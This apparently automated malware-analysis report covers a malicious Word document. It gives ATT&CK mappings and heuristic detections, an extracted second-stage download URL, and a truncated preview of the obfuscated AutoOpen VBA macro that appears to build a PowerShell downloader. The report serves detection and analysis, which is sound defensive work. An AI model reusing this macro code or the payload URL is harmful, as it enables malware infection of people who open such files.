MALICIOUS
Risk Score: 142
Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call, indicating an attempt to execute external code. The script appears to be obfuscated but contains concatenated strings that likely form a URL for downloading a second-stage payload. The presence of the Shell() call and the suspicious URL strongly suggest downloader or dropper functionality.
Heuristics (5)
- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://kmIopvTNE5CQUOVsWSCfrCItASpro.org/Qnr4n6rsfqvsE4N5a6Uf9iROdMLs (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 139770 bytes | 6c2818ac3c97d0bf3f3fbfc05f36b9eca89dfed7111ded07baa4be9ef241f9d2 |
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "LiJXDYFmci"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BkRtLA()
On Error Resume Next
SoERVmhwbH = (naHhVp - CDbl(271727) + jfUXTsfjJs + Fix(UZSsKOmUS / CLng(805001 * Sqr(DlXnPKEjWh))) - 360356 / Sin(aErnVvVMmmc - OHhruQtvBX - 430180 + CLng(fuzjDhazmLo)) * 294935 * Fix(271727))
hhkHzTirb = "wxGGUE0KjqwydZAWt7x7ss2b2Lowershell ((x'((Ax7u07yQTSswQ3ufDAuzeSyG"
Bqijajn = Left(Right(hhkHzTirb, 40), 12) + Left(Right(hhkHzTirb, 27), 7) + CStr(Left(Right(hhkHzTirb, 7), 1)) + CStr(Left(Right(hhkHzTirb, 28), 1)) + Left(Right(hhkHzTirb, 47), 1)
oSiYwEzRYkm = Chr(43)
zNNZMAQmszz = "5BrTNfh4f = &AxzugFEtmcgvF0as2S9Dn7Ax7yfnsadasdXJa15wpiJZ"
MtPbUiFwIN = Left(Right(zNNZMAQmszz, 22), 12) + CStr(Left(Right(zNNZMAQmszz, 48), 6)) + Left(Right(zNNZMAQmszz, 23), 1)
IbuGzdttC = "l'3"
BojKFG = CStr(Left(Right(IbuGzdttC, 2), 1))
tKsqTwDa = Chr(43)
RRBjO = "l'3"
HZvjf = CStr(Left(Right(RRBjO, 2), 1))
EGHbGPv = Chr(43)
YwYNjhkjZDi = (IzjCAsqbqqN - CDbl(511993) + kfooFkjHi + Fix(WiRcuXs / CLng(104647 * Sqr(pqPLttvwVic))) - 548578 / Sin(DilsdAtvioW - QmaBlXwT - 687102 + CLng(qAWQYmusJ)) * 296899 * Fix(511993))
wOwVLUWGq = "3c5Ax7Nfh4fsOLGAx7(nFEtm"
OtwNBqkB = CStr(Left(Right(wOwVLUWGq, 9), 5)) + CStr(Left(Right(wOwVLUWGq, 21), 3))
PYSsTwJpdRn = Chr(43)
jhiAGw = "3c5Bn7Nfh4fsOLGYAx77Nntmcgv"
JYzHhzDLj = Left(Right(jhiAGw, 11), 6) + Left(Right(jhiAGw, 23), 3)
IFhNoZq = Chr(43)
YtzWDviL = "P5nAx7E27B3U"
SXUIwHK = Left(Right(YtzWDviL, 10), 3) + Left(Right(YtzWDviL, 4), 1)
JdzErHTq = Chr(43)
zhXwOASfnQZ = "P5EAx77NTB3UHe'nh8sOq"
VwFUt = CStr(Left(Right(zhXwOASfnQZ, 18), 5)) + CStr(Left(Right(zhXwOASfnQZ, 8), 2))
naMcdA = (rITdkAZqiq - CDbl(887545) + qzMDV + Fix(FiIEiDw / CLng(321012 * Sqr(IKFHc))) - 257525 / Sin(QQbTwoGOHZ - jKUBzzkE - 212506 + CLng(WushMEXZcqU)) * 125244 * Fix(887545))
DiwPnj = Chr(43)
nAjSzTRKCN = "P5E'n7A2TB3x7RWnh8"
dtPnWWkMJjC = CStr(Left(Right(nAjSzTRKCN, 15), 4)) + Left(Right(nAjSzTRKCN, 7), 2)
pWVZMsji = Chr(43)
pBsvacJ = "P5EAx7NATB3UHx7nh8sOq"
GVPdRwDXizk = CStr(Left(Right(pBsvacJ, 18), 5)) + CStr(Left(Right(pBsvacJ, 8), 2))
ZqPzmnI = Chr(43)
rLmkTi = "PAxz77E2T"
iSTtLjli = Left(Right(rLmkTi, 8), 2) + Left(Right(rLmkTi, 4), 1)
jWEBzX = Chr(43)
LGznCKVU = "P5En7NA2TB3x7RWnh8"
AJEYjpfh = CStr(Left(Right(LGznCKVU, 15), 4)) + Left(Right(LGznCKVU, 7), 2)
cjQbTqzdjks = (nmcAQFciJRd - CDbl(618317) + ijXfrTLLZkF + Fix(voMPawVqP / CLng(116564 * Sqr(AOtRVHt))) - 498327 / Sin(lLCXsjTUl - YhTDhrE - 495944 + CLng(sMIMvndO)) * 99532 * Fix(618317))
ADEZfzM = Chr(43)
rqkwUidYz = "P5Ax77E2'B3U"
YCaRm = Left(Right(rqkwUidYz, 10), 3) + Left(Right(rqkwUidYz, 4), 1)
NlCdzLmp = Chr(43)
MnQWfvpwh = "P5Ez7'w-objUHRWnhAx7qtc2KFu"
YUVjWBG = CStr(Left(Right(MnQWfvpwh, 22), 6)) + Left(Right(MnQWfvpwh, 10), 3)
UoLEbEQ = Chr(43)
jjqHqhmrWb = "P5EzAx7ecn3UHRWn7NsOqtc2"
QabGzbHr = Left(Right(jjqHqhmrWb, 20), 6) + Left(Right(jjqHqhmrWb, 8), 2)
aSmjlHhk = (iVzMiR - CDbl(782369) + FSNaJittYL + Fix(zkZoOV / CLng(70056 * Sqr(QwsPCwNuV))) - 894885 / Sin(MisjAzwz - fSvZtHav - 595541 + CLng(AltHbhNVw)) * 639108 * Fix(782369))
pbVoEIVjVz = Chr(43)
RXauqEGujH = "P5n7AxE2TB7UHRW"
iCGfSupjiQ = CStr(Left(Right(RXauqEGujH, 13), 4)) + CStr(Left(Right(RXauqEGujH, 5), 1))
qPUsTjSjwp = Chr(43)
SiRXOjXuHGH = "P5Ez77E2TAx7Ntn7N) rqtc2KFuw8IjTandom'1vjIopvTNE5CQ"
vYknzGhwtY = Left(Right(SiRXOjXuHGH, 42), 11) + Left(Right(SiRXOjXuHGH, 19), 6)
IboIlSrsNd = Chr(43)
iWQzG = (DKzzsDbMWYz - CDbl(108208) + dusKcmnJn + Fix(brmuJMvCj / CLng(384579 * Sqr(waJipRtAX))) - 244764 / Sin(lIuzTpIY - dLzFWjGNztP - 795479 + CLng(ToOiClN)) * 738810 * Fix(108208))
NrwmI = "P5Ez7';uyfYYHRWnh8sUAxc2KFuw8I"
KjDCiHKh = CStr(Left(Right(NrwmI, 25), 7)) + Left(Right(NrwmI, 11), 3)
OvwwEB = "7jP"
LifMZts = Left(Right(OvwwEB, 3), 1)
ZBqcSoCw = Chr(43)
aiCcrroHPO = "P5Ez77Ax7 = .RW ...
```
(truncated)